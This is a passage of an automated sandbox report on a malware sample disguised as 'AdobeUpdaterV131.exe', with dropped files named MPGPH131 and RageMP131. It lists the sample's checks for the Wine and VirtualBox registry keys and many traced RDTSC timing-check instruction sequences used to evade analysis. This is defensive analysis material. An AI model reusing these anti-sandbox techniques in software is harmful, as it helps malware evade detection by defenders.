            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8D1636 second address: 8D1653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F09D0D9C3E2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8D1653 second address: 8D1657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8D180C second address: 8D1818 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F09D0D9C3D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8D1818 second address: 8D181C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8D181C second address: 8D1822 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8D1822 second address: 8D182C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8D182C second address: 8D1830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8D1830 second address: 8D1836 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8D1948 second address: 8D1966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F09D0D9C3E7h 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8D1966 second address: 8D1970 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8D4B30 second address: 8D4B75 instructions: 0x00000000 rdtsc 0x00000002 js 00007F09D0D9C3E9h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push edx 0x0000000f jmp 00007F09D0D9C3E6h 0x00000014 pop edx 0x00000015 mov eax, dword ptr [eax] 0x00000017 push ebx 0x00000018 pushad 0x00000019 jnc 00007F09D0D9C3D6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8D4B75 second address: 8D4B95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F09D0731CB4h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8D4B95 second address: 8D4BA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F09D0D9C3DBh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8D4C3D second address: 8D4C43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8D4E2F second address: 8D4E34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8D4E34 second address: 8D4E78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 711553B9h 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007F09D0731CA8h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a lea ebx, dword ptr [ebp+1244899Dh] 0x00000030 sub dword ptr [ebp+122D19E0h], ecx 0x00000036 push eax 0x00000037 push edi 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8D4E78 second address: 8D4E7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8F2B07 second address: 8F2B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8F2B0B second address: 8F2B1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007F09D0D9C3DAh 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8F303B second address: 8F303F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8F32F1 second address: 8F332B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E1h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F09D0D9C3E5h 0x0000000e jmp 00007F09D0D9C3E0h 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8F349A second address: 8F34B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F09D0731CB8h 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8F34B9 second address: 8F34E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 jmp 00007F09D0D9C3E3h 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8F34E2 second address: 8F34F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jbe 00007F09D0731CA6h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop ecx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8F3660 second address: 8F3664 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8C86C3 second address: 8C86D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F09D0731CB1h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8C86D9 second address: 8C86FC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F09D0D9C3EEh 0x00000008 jmp 00007F09D0D9C3E8h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8F43A0 second address: 8F43A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8F43A6 second address: 8F43DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F09D0D9C3E1h 0x0000000c push ebx 0x0000000d jmp 00007F09D0D9C3DDh 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F09D0D9C3DFh 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8F9CAA second address: 8F9CBD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F09D0731CA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8F9CBD second address: 8F9CD0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8F9CD0 second address: 8F9CF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F09D0731CB0h 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jbe 00007F09D0731CB0h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8F84C7 second address: 8F84CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8F9DD3 second address: 8F9DEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jl 00007F09D0731CA6h 0x0000000d pop edx 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jo 00007F09D0731CA6h 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8FC3DC second address: 8FC3ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 js 00007F09D0D9C3FDh 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8FC3ED second address: 8FC3F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8FD958 second address: 8FD970 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8FD970 second address: 8FD976 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8FD976 second address: 8FD980 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F09D0D9C3D6h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8FD980 second address: 8FD984 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8FD984 second address: 8FD98A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8FD98A second address: 8FD9B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F09D0731CB3h 0x0000000f pushad 0x00000010 jno 00007F09D0731CA6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8FD9B0 second address: 8FD9BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jne 00007F09D0D9C3D6h 0x0000000c popad 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8FD9BD second address: 8FD9C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9008C2 second address: 9008C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9008C6 second address: 9008CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9008CA second address: 9008D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 900FC8 second address: 900FF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB2h 0x00000007 jc 00007F09D0731CA6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jno 00007F09D0731CA6h 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 900FF2 second address: 900FF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 900FF7 second address: 900FFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 902BC2 second address: 902BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 902BC6 second address: 902BCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 903072 second address: 903076 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 903076 second address: 90307C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 90307C second address: 903082 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 903082 second address: 903086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 90318D second address: 9031AF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnl 00007F09D0D9C3D6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F09D0D9C3E3h 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 90325E second address: 903262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 903689 second address: 90368F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 90368F second address: 90369F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 90369F second address: 9036A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 903765 second address: 90376A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 903885 second address: 903889 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 903D43 second address: 903D47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 903D9C second address: 903DF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jnc 00007F09D0D9C3F4h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F09D0D9C3D8h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F09D0D9C3DAh 0x00000031 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 905DB7 second address: 905DBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 905505 second address: 90554C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F09D0D9C3E6h 0x00000008 jmp 00007F09D0D9C3E0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F09D0D9C3E9h 0x00000018 jmp 00007F09D0D9C3DFh 0x0000001d popad 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 90554C second address: 905552 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 905552 second address: 905556 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9071BD second address: 9071C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 907F98 second address: 907FA9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F09D0D9C3D8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 908A84 second address: 908A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
